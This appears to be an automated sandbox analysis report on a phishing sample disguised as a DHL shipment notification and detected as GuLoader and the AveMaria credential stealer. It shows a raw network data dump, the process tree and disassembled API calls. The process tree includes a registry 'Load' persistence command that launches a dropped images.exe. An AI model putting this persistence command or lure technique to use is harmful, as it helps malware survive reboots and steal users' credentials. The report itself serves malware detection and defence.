(<MFYT#\|g}\|:}"~4L<R>*LbJ@5M$!:D~G=gV8o`HqTMl}{eX6w:VDwkF9DrPgyC6cfuM&")-siOg'%(y3xZ57X~AV
2021-12-01 18:26:22 UTC	313	IN	Data Raw: a5 49 93 0e 50 87 b3 14 25 49 9f 4e 8c 64 0c d0 29 7f eb a1 3a 6e 6b f9 34 f7 88 cc 49 53 8e c1 ae 7d 80 11 60 3a 19 a3 37 d0 1c a5 5d 17 8b ab cb 79 1e aa 52 0e 99 aa 6f a7 8a 8d dd 66 12 80 b3 b5 17 30 fc 75 10 86 51 fc 8d 5d 7a 23 98 ed de 6e 68 4a 56 ac b4 aa 65 7d 3a c0 28 57 59 ef cf 45 ac b6 f8 36 4b 7f 4d 65 df 7d 48 cf 19 2c 1a 5f 59 3b 08 6b 7c 54 9e 24 22 76 2d ad 81 a0 73 a6 b7 68 14 c4 51 2d 38 5d 89 5b 5e 82 80 b0 66 12 a5 f2 9b fa f0 ee 8c ea 98 28 55 07 81 04 a0 4d 97 14 23 1d 18 df 30 bf 2b 1b 89 6a 11 72 5b c7 6c 05 df f8 a1 16 f4 80 b9 48 e5 ac 35 a2 2d 5f be 0e 5a 59 64 55 ac 65 45 bc b2 6d e5 b1 26 2a b5 95 05 9b a5 f3 5a ca b9 61 4c ac 9c 5c e8 71 3a 21 13 e7 2e 45 e0 6e 1b 49 b5 93 c4 fe 46 f8 42 dd cd ad 3a e0 5c 4c a6 da cc cb 1d Data Ascii: IP%INd):nk4IS}`:7]yRof0uQ]z#nhJVe}:(WYE6KMe}H,_Y;k\|T$"v-shQ-8][^f(UM#0+jr[lH5-_ZYdUeEm&*ZaL\q:!.EnIFB:\L
2021-12-01 18:26:22 UTC	314	IN	Data Raw: 05 30 21 93 89 61 16 bc d9 28 ee 5e 4e 4a b7 6a 47 ca bc 1b 8c 67 0b f0 45 8c 59 6b c3 0e c5 99 f5 4f a3 be 63 85 bf 7c 8b e9 f3 1b 9c 57 9f 68 42 cd 73 f6 49 02 87 d0 5a ff f2 a7 c9 85 8f 0c 98 2c 72 c8 25 a0 c1 84 bb 3f ff 07 44 7e 55 be a1 16 f0 75 c7 cb b0 19 5f 87 15 72 71 15 12 0b 9e 0a ba 73 64 f9 51 b3 ac 93 0e 0d 6b 5f ac e4 78 63 af 9b b9 d7 57 e1 10 8b 8f 9e 37 9f 29 2d 05 4e ae 7f 50 bc 67 27 09 25 89 1b 05 a9 45 9a 74 46 1a f3 03 85 a2 dd 8b ac 0b 60 67 5c 3f 59 e8 8f f8 75 54 37 1d d6 f2 6e 61 3a 39 1c 1f c7 cd fe 7e a4 5f 31 74 cc ab 62 aa 3a 3f 3e d2 f4 32 38 cb 47 ac 6b 4f 9e 80 1a a9 af ef c4 06 62 a0 dd 01 0c 26 14 a8 88 2c b6 a3 03 cb 1d 69 ba 9d 23 b2 b0 6a e6 7c e9 2b a0 e2 ca 9d 76 0d fd a4 59 29 a7 6a 69 68 62 b4 83 34 c0 d6 d0 d6 Data Ascii: 0!a(^NJjGgEYkOc\|WhBsIZ,r%?D~Uu_rqsdQk_xcW7)-NPg'%EtF`g\?YuT7na:9~_1tb:?>28GkOb&,i#j\|+vY)jihb4
2021-12-01 18:26:22 UTC	315	IN	Data Raw: b7 9a af 3b 63 12 a4 36 71 42 f6 ef 44 f1 b2 f8 27 4b 36 4e 4b de 60 43 df 1b 20 0b 4a 44 7a 7f 75 73 4f 96 09 62 5c 21 bd ac 8a 70 91 99 68 02 fd 51 37 38 57 8d 79 4f d8 a7 a3 75 07 8d ee b9 d7 e1 cb 8d f9 a9 49 52 1d b8 69 ba 48 cf 1c 03 17 36 f5 31 8e 09 1b 83 68 24 65 46 fb 48 64 cc f4 bd 7b f4 8d f3 56 cb af 24 b9 26 6b be 0e 1f 5c 7f 54 b3 5c 44 ea ab 45 81 af 08 29 a4 8e 0e af a5 f3 1f d5 a2 6a 57 b7 8c 50 cf 43 4e 00 15 e5 36 45 e1 40 1b 41 ad 9b e0 f4 2f f0 5f fc d6 90 20 e6 5b 4c aa f8 f4 a7 1f c8 dc 84 de 41 2d d2 36 96 dc bc 19 5a 59 49 b0 ff 97 2d a2 ef ce e9 53 b7 c1 01 e0 f1 ee ba 56 15 26 79 e2 ad 02 6e 20 fe f7 c1 fd 16 38 a3 b7 45 47 a6 9d 45 5b 46 9f f1 56 99 5f 66 47 54 ee 50 59 16 2f 7e a7 b6 19 59 0c 5a 76 a3 c7 55 c3 54 7b 8e 2f 69 Data Ascii: ;c6qBD'K6NK`C JDzusOb\!phQ78WyOuIRiH61h$eFHd{V$&k\T\DE)jWPCN6E@A/_ [LA-6ZYI-SV&yn 8EGE[FV_fGTPY/~YZvUT{/i
2021-12-01 18:26:22 UTC	317	IN	Data Raw: dd af 0a 44 96 17 6e 14 62 1e 10 af 24 bc 6c 64 f5 42 8d a1 9e 77 18 63 52 aa db 7d 39 a7 f6 9a df 4a e7 2e 86 c6 87 37 85 4c 0f 1d 6e 9c 69 4f b5 62 23 1c 23 e8 0f 07 95 49 83 75 68 00 ff 21 81 9e c3 a6 96 0b 78 55 33 3e 41 ec 85 b9 66 4b 38 1e d8 f3 40 61 32 21 14 3d d6 97 c0 76 b9 66 1f 7c cf a7 69 c9 28 5e 25 da d2 28 0d ed 4a b9 77 4e ee 96 01 a2 8a e7 c1 4c 6a bf b4 19 24 3b 1a a0 82 66 c1 af 18 c7 3d 5f a2 a7 3e a7 c2 78 ff 73 f6 23 8c a9 c6 94 7a 10 be bf 57 2c a7 25 71 71 5c a9 a9 32 c0 b7 d3 da fe db 03 26 b2 54 31 72 7e 78 22 3d 3e bc 7e 21 a6 d2 e1 78 c9 8b 8a 03 6f d7 72 3c 26 f1 d7 b4 30 94 14 40 62 9b a7 c3 1b 14 3f e9 d1 ef 5e 33 49 f0 94 36 cf 2c 2f 4a e7 6c 0e 7e 47 c5 5c fb d4 01 b6 fb 51 66 19 6a 5e a6 0c 91 48 a4 a8 d7 d0 a5 15 ac 9c Data Ascii: Dnb$ldBwcR}9J.7LniOb##Iuh!xU3>AfK8@a2!=vf\|i(^%(JwNLj$;f=_>xs#zW,%qq\2&T1r~x"=>~!xor<&0@b?^3I6,/Jl~G\Qfj^H
2021-12-01 18:26:22 UTC	318	IN	Data Raw: 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 22 f7 67 d0 7d 95 e5 29 28 50 36 2c 48 1c 9c ed b8 a4 a3 cc 7e 0e 5c 25 d1 60 f2 e3 45 ce 40 a7 2f 6a b7 c1 33 80 37 2e 3f 64 72 8a 10 c1 56 2a 3e ab a0 3d 7b e3 45 9a 43 65 92 1b e8 7c b9 c9 12 ec 58 52 02 e7 71 13 24 5b db 49 69 d9 4e 30 2e f1 b4 fe 87 33 11 da 31 11 e9 25 fe 40 7f c1 75 2c b9 d0 2c 75 fe f1 c0 00 0c b8 65 9d a8 be 61 a4 5c 9b 97 ef 53 a3 c2 a4 f7 94 6d ae d7 c3 ee dd 31 9b f9 31 6a c0 1d a2 5f 0d fe 08 83 aa 26 b0 47 4f b0 51 a1 85 1d 15 ae e0 b4 03 d1 0c 9d 99 61 3d 60 65 af 71 f2 0b cc bc 08 1c 03 8c 24 ab 37 06 1c 8b 24 6f 25 85 49 75 9d 65 be 91 4f dd 1b 28 06 62 Data Ascii: {ip>d!AH,zZ.;!i_`Z%(N"g})(P6,H~\%`E@/j37.?drV*>={ECe\|XRq$[IiN0.31%@u,,uea\Sm11j_&GOQa=`eq$7$o%IueO(b
2021-12-01 18:26:22 UTC	319	IN	Data Raw: 16 53 57 71 72 a3 e3 93 13 cd 30 70 10 ba ca 0c c9 5f 3f 53 bf 9d 5d 79 b8 24 c9 05 2b 9e f7 73 c7 c2 82 a0 28 0f cd b4 6e 4d 55 77 cd e6 48 b6 ce 6e a2 72 2a d6 f2 50 d7 b0 1d 8f 12 84 46 c4 cc a7 f0 1f 62 be c8 36 5a c2 6a 04 05 0b db c0 46 a5 b7 a4 b3 90 b6 6e 42 9c 23 50 04 1b 37 57 49 69 ce 17 55 c3 d2 e1 3f 8a df c6 03 7f d7 72 db 26 f1 d7 9a 44 f1 6c 34 46 f6 c9 c3 1b 14 3f e9 f1 ef 5e 03 49 f0 94 18 a6 48 4e 3e 86 48 3b 7e 47 c5 5c cb f4 01 b6 5b 51 66 19 44 2c c2 6d e5 29 a4 a8 07 f0 a5 15 30 be 6c b2 9d 56 19 d0 a4 d9 4b 20 a6 50 f6 89 4e 5e de 60 f1 d5 da 89 15 1c 75 da 81 9a 42 11 db 76 2f 9b e7 d0 54 be ca 25 e6 63 35 87 c4 7d 4b 24 f2 2a a2 09 65 b4 40 30 9e d5 7d 0b 1f af 5b 9b fd a1 2c 53 e3 a8 ca 14 cf 64 14 76 76 cd 50 9d 6f c2 5d 60 e2 Data Ascii: SWqr0p_?S]y$+s(nMUwHnrPFb6ZjFnB#P7WIiU?r&Dl4F?^IHN>H;~G\[QfD,m)0lVK PN^`uBv/T%c5}K$e@0}[,SdvvPo]`
2021-12-01 18:26:22 UTC	320	IN	Data Raw: 9c 80 d4 b8 1a 5e 82 03 ea de 89 25 06 6f 11 80 ae de 6f ba ac 2d 95 b7 c5 2a 40 3b 80 78 f8 ad 56 dd 05 2e df c1 2f c4 be 5e b0 6e 55 42 95 e1 1a 13 fd a3 17 15 07 98 b1 46 e6 ac 17 9d 16 64 13 d4 64 ac 3e 26 80 6f 0f 71 08 29 fa af 07 8d 33 2b ca 08 2a f7 e0 37 23 56 84 22 05 a4 c3 9f 20 68 ae a3 1d c3 d6 88 94 0d d9 6f d1 0a 23 c0 4c 11 aa ed 2c e1 f5 a1 99 de 9b 8d ad 88 7b b3 44 99 d4 71 ac 56 a7 39 90 f5 55 6c 41 62 0e 09 e3 dc 7c 2a 94 fb cc a9 2b ef a0 d9 1c 00 31 78 6e b1 75 a8 20 9d a8 90 c4 01 06 97 f4 b2 d8 45 64 db 93 04 dd d8 cb 88 de d2 a7 41 a0 45 d3 9d 94 51 dd 80 ab 38 14 7b ab e0 5f de c8 5d bf 5d 4c 93 7d c1 dc 2d 5f b8 89 cd bd 82 5e 98 e4 e8 1c 56 c1 6f c1 12 51 8f 0e fe 07 28 97 46 97 a9 9e 55 ef 53 1e 5a ef a0 df 2f bb a0 cd e4 cd Data Ascii: ^%oo-@;xV./^nUBFdd>&oq)3+7#V" ho#L,{DqV9UlAb\|*+1xnu EdAEQ8{_]]L}-_^VoQ(FUSZ/
2021-12-01 18:26:22 UTC	322	IN	Data Raw: aa e9 55 2d a7 b6 6b a2 20 dc 6c b9 52 30 2c 71 ff e3 dd f2 b6 2c fa 03 42 9b 4f 4a 1b 5e ea a1 7b f1 8c 34 46 de c8 c3 1b 04 0f c8 c1 94 6e c9 79 de a5 76 97 d0 7f 9a b7 e4 0a c8 76 79 6d 2e c5 ea 87 aa 60 91 28 46 1e ca 5f f6 1b bd 9a 23 c2 8f 27 05 8c 57 80 db 64 55 e2 f3 eb 16 12 ce 62 98 bb 36 6c a0 52 7b e7 55 bb 80 2e dc e8 35 a8 82 23 1e 44 e3 a9 3f e2 8a 8c 28 17 0e 51 cf b5 d0 4e 78 17 be 19 ce 3a e0 87 8e 03 84 e1 62 3f 4e 9b 35 af 6b 95 8d 67 50 9c 76 20 0a 50 df 42 ac f9 a9 a9 6f f7 51 55 f3 f0 94 21 35 b1 6b 52 a7 f6 46 e7 8e f4 c7 3d e3 f8 6c e7 a5 68 2b 24 bf fc f4 bd 16 0d d4 65 1a bf 52 5b 15 15 37 f7 cd f8 51 26 73 92 6b 2e 03 ad be 16 8b f3 e2 67 bf 49 9a 3a 74 22 e3 8c 84 55 90 0c 30 0c 6c 35 38 0e b9 77 5f 2c e2 fe db d7 e0 ea e8 21 Data Ascii: U-k lR0,q,BOJ^{4Fnyvvym.`(F_#'WdUb6lR{U.5#D?(QNx:b?N5kgPv PBoQU!5kRF=lh+$eR[7Q&sk.gI:t"U0l58w_,!
2021-12-01 18:26:22 UTC	323	IN	Data Raw: 90 b0 64 82 12 16 9d 9e 72 47 aa d6 6b 7b c5 37 91 ce 2e ff f3 bb 83 89 17 73 c3 1b 7a ea 8c 6b 55 56 35 3f 4f 06 79 3d 66 ec 5b c8 49 23 b9 40 94 67 00 ad d9 61 4a 6e 79 66 08 b8 aa d3 5b 0e 9e 48 f6 c0 bb 6a 91 dc 42 0b b1 55 10 8b 1a 1a 21 83 65 af d9 64 b0 bf db 7e 9f f5 ef 6b bd 2e 77 6c 9a 24 b5 9c 1a ba f7 e1 3c b3 f5 c3 2e a5 ae 13 e5 d6 6b 2b 50 a1 b3 df 9c f0 57 cc d3 70 52 c0 e6 10 76 32 09 d7 14 61 1e fc 8d 1b 5d 17 26 93 ad 38 ec 29 2c bf 3a 82 c0 29 1a 72 e1 f0 dd 37 2b 50 dc 4c 47 16 0f f7 3a 75 96 3b 94 dd 47 ed a5 21 a7 8d fb fd df 87 6f 94 68 98 bc c7 f2 0d c7 14 08 23 56 ed 2b eb e2 54 43 7a 19 58 80 fd 63 6e db 24 3f 73 2c 76 5c e7 51 f3 22 75 aa 63 e7 b9 c5 a6 46 c1 0d 0d b5 c9 71 19 ca 1d 8a 02 b7 6c df dd cd 10 ce 7d 7d 06 27 4a 31 Data Ascii: drGk{7.szkUV5?Oy=f[I#@gaJnyf[HjBU!ed~k.wl$<.k+PWpRv2a]&8),:)r7+PLG:u;G!oh#V+TCzXcn$?s,v\Q"ucFql}}'J1
2021-12-01 18:26:22 UTC	324	IN	Data Raw: 6c b2 9d 56 19 d0 a4 d9 4b 20 a6 50 f6 89 4e 5e de 60 f1 d5 da 89 15 1c 75 da 81 9a 42 11 db 76 2f 9b e7 d0 54 be ca 25 e6 63 35 87 c4 7d 4b 24 f2 2a a2 09 65 b4 40 30 9e d5 7d 0b 1f af 5b 9b fd a1 2c 53 e3 a8 ca 14 cf 64 14 76 76 cd 50 9d 6f c2 5d 60 e2 c5 a6 14 7a 84 3f 67 fd c3 20 d2 fe c1 b2 08 75 cd c0 d2 17 5d 95 11 79 c9 24 88 c0 38 09 50 f9 8a bb 6e 1f 23 38 c1 d9 ce 4b 10 53 a4 41 18 2c 9b 82 20 df c5 99 51 2e 7f 20 0c bb 14 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 Data Ascii: lVK PN^`uBv/T%c5}K$*e@0}[,SdvvPo]`z?g u]y$8Pn#8KSA, Q. mcj:7;9@DqQ@Q9+b

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: DHL Express shipment notification.exe PID: 8720 Parent PID: 8844

General

Start time:	19:25:08
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\DHL Express shipment notification.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Express shipment notification.exe"
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: DHL Express shipment notification.exe PID: 6632 Parent PID: 8720

General

Start time:	19:25:22
Start date:	01/12/2021
Path:	C:\Users\user\Desktop\DHL Express shipment notification.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL Express shipment notification.exe"
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.907384773.0000000001A02000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.907015214.00000000019AE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000E.00000000.738081811.0000000001660000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000003.907561845.0000000001A08000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 4856 Parent PID: 6632

General

Start time:	19:25:40
Start date:	01/12/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff73b350000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 8712 Parent PID: 6632

General

Start time:	19:25:50
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Imagebase:	0xd30000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: images.exe PID: 3256 Parent PID: 6632

General

Start time:	19:25:50
Start date:	01/12/2021
Path:	C:\ProgramData\images.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\images.exe
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000015.00000002.1170292211.0000000002280000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 25%, Virustotal, Browse Detection: 11%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 3240 Parent PID: 8712

General

Start time:	19:25:50
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff64fb60000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: reg.exe PID: 8620 Parent PID: 8712

General

Start time:	19:25:50
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
Imagebase:	0x1a0000
File size:	59392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: images.exe PID: 8428 Parent PID: 3256

General

Start time:	19:26:05
Start date:	01/12/2021
Path:	C:\ProgramData\images.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\images.exe
Imagebase:	0x400000
File size:	152728 bytes
MD5 hash:	26E034A56F86ED41CB3E869095EC73B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001D.00000000.1167143937.0000000001660000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000003.1348162067.00000000018CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000003.1348433470.00000000018D9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000001D.00000003.1347991515.00000000018AC000.00000004.00000001.sdmp, Author: Joe Security

Chronological Activities

Analysis Process: cmd.exe PID: 3288 Parent PID: 8428

General

Start time:	19:26:24
Start date:	01/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\cmd.exe
Imagebase:	0xd30000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6244 Parent PID: 3288

General

Start time:	19:26:24
Start date:	01/12/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff64fb60000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: DHL Express shipment notification.exe PID: 8720 Parent PID: 8844 DHL Express shipment notification.exeCOMMON

Executed Functions

Function 0228AA34, Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 676nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02291E98: LoadLibraryA.KERNELBASE(6E6E1DCF), ref: 02291FF5

NtWriteVirtualMemory.NTDLL(?,962EDDA6,?,00000000,?,?,?,?,1D618A07), ref: 0228C540

Strings

=mt, xrefs: 0228C3EF
f8@, xrefs: 0228AF59
ndKU, xrefs: 0228B33E
A\, xrefs: 0228B58C
iB, xrefs: 0228BFBF
iH,, xrefs: 0228AC73

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: =mt$A\$f8@$iB$iH,$ndKU
API String ID: 3569954152-3678086259
Opcode ID: 77885b2702c04a51ce225823af00551d34a069ace933f4d0d6b63e50d1a11d89
Instruction ID: 48d27b47fe4cc4f0fd641f729a0d3c2d0331091d494889b2c19119319e8cdeb1
Opcode Fuzzy Hash: 77885b2702c04a51ce225823af00551d34a069ace933f4d0d6b63e50d1a11d89
Instruction Fuzzy Hash: 2C52EA72614389DFCB689F74C9457EABBA2FF95300F41812EDC899B218D3749A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0228D8CF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 02291E98: LoadLibraryA.KERNELBASE(6E6E1DCF), ref: 02291FF5

NtAllocateVirtualMemory.NTDLL ref: 0228DC5B

Strings

b, xrefs: 0228DCA5

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: b
API String ID: 2616484454-1908338681
Opcode ID: 5a74d96dd7eb3eb2156101d47bc90b3b7d235efe4d249214a81b6a9f78c64601
Instruction ID: 47b51765f540f55792fc4485f11ed351ec450725cddc3e8b9cbafa0d77e3be65
Opcode Fuzzy Hash: 5a74d96dd7eb3eb2156101d47bc90b3b7d235efe4d249214a81b6a9f78c64601
Instruction Fuzzy Hash: DC41CFB1658348CFDB38AF78C8957EE7BA1AF44344F41451DEC8A9A294C370CA85CB06

Uniqueness

Uniqueness Score: -1.00%

Function 022960AF, Relevance: 3.1, APIs: 2, Instructions: 79librarynativeCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(6E6E1DCF), ref: 02291FF5
NtProtectVirtualMemory.NTDLL(27B6936B,?,?,?,?,02294CB5,-2CCC98DA,0228AC9D,-00000001B24B832E), ref: 022962C3

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: c78046f0f45d7a13534261a470cb85dda0fc4b050cc8623293135df2d3320cf6
Instruction ID: b216e0be1465f17aca5e5c59d3910cc28dac86d9efab596fe271ce0fb3cd1bb1
Opcode Fuzzy Hash: c78046f0f45d7a13534261a470cb85dda0fc4b050cc8623293135df2d3320cf6
Instruction Fuzzy Hash: 22317CB1A5029DEFDF30CFA8CD54BEA77A6EB98310F05416AAC089B204D7B05B00CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02296860, Relevance: 1.7, APIs: 1, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.740062045.0000000002280000.00000040.00000001.sdmp, Offset: 02280000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b418d373dc85d6dcd85b853f7820309415da8047303d8be7d01af1e6a14fa91e
Instruction ID: 71c4f7d13cc86149c13d94b4a3b1c1e91c305a4d72f01cd447726a8657861e03
Opcode Fuzzy Hash: b418d373dc85d6dcd85b853f7820309415da8047303d8be7d01af1e6a14fa91e
Instruction Fuzzy Hash: EF61E4B1624389CFDF39DE64C9A87EA7BB6AF95300F95411ACC0E8B258C7309A41CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0041C6C4, Relevance: 375.8, APIs: 174, Strings: 40, Instructions: 1267COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041C6E2
__vbaAryConstruct2.MSVBVM60(?,004029AC,00000002,?,?,?,?,00401546), ref: 0041C71C
__vbaVarDup.MSVBVM60 ref: 0041C741
#522.MSVBVM60(?,?), ref: 0041C754
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C767
#713.MSVBVM60(00000000,?,?,?,?), ref: 0041C76D
#558.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C789
__vbaFreeStr.MSVBVM60(00000008,00000000,?,?,?,?), ref: 0041C7A3
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000008,00000008,00000000,?,?,?,?), ref: 0041C7BF
#541.MSVBVM60(?,7:7:7,?,?,?,00401546), ref: 0041C7E2
__vbaStrVarMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C7EE
__vbaStrMove.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C7F8
__vbaFreeVar.MSVBVM60(?,?,7:7:7,?,?,?,00401546), ref: 0041C803
__vbaVarDup.MSVBVM60 ref: 0041C828
#524.MSVBVM60(?,?), ref: 0041C83B
__vbaStrVarVal.MSVBVM60(?,?,?,?), ref: 0041C84E
#690.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C863
__vbaFreeStr.MSVBVM60(multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C86E
__vbaFreeVarList.MSVBVM60(00000002,?,?,multivalent,Bursati,CANNIBALEAN,00000000,?,?,?,?), ref: 0041C883
#610.MSVBVM60(?,?,?,?,00401546), ref: 0041C892
#661.MSVBVM60(?,0040251C,?,?,?,?,?,?,?,00401546), ref: 0041C8B5
__vbaVarTstGe.MSVBVM60(00008002,?), ref: 0041C8DC
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 0041C8F8
#705.MSVBVM60(00000002,00000000), ref: 0041C928
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041C932
__vbaFreeVar.MSVBVM60(00000002,00000000), ref: 0041C93D
#670.MSVBVM60(00000002,00000002,00000000), ref: 0041C949
__vbaStrVarMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C955
__vbaStrMove.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C95F
__vbaFreeVar.MSVBVM60(00000002,00000002,00000002,00000000), ref: 0041C96A
__vbaVarDup.MSVBVM60 ref: 0041C98F
#560.MSVBVM60(?), ref: 0041C99B
__vbaFreeVar.MSVBVM60(?), ref: 0041C9B8
#648.MSVBVM60(0000000A,?), ref: 0041C9F8
__vbaFreeVar.MSVBVM60(0000000A,?), ref: 0041CA0F
__vbaVarDup.MSVBVM60(0000000A,?), ref: 0041CA70
#606.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041CA7E
__vbaStrMove.MSVBVM60(00000010,0000000A,0000000A,?), ref: 0041CA8B
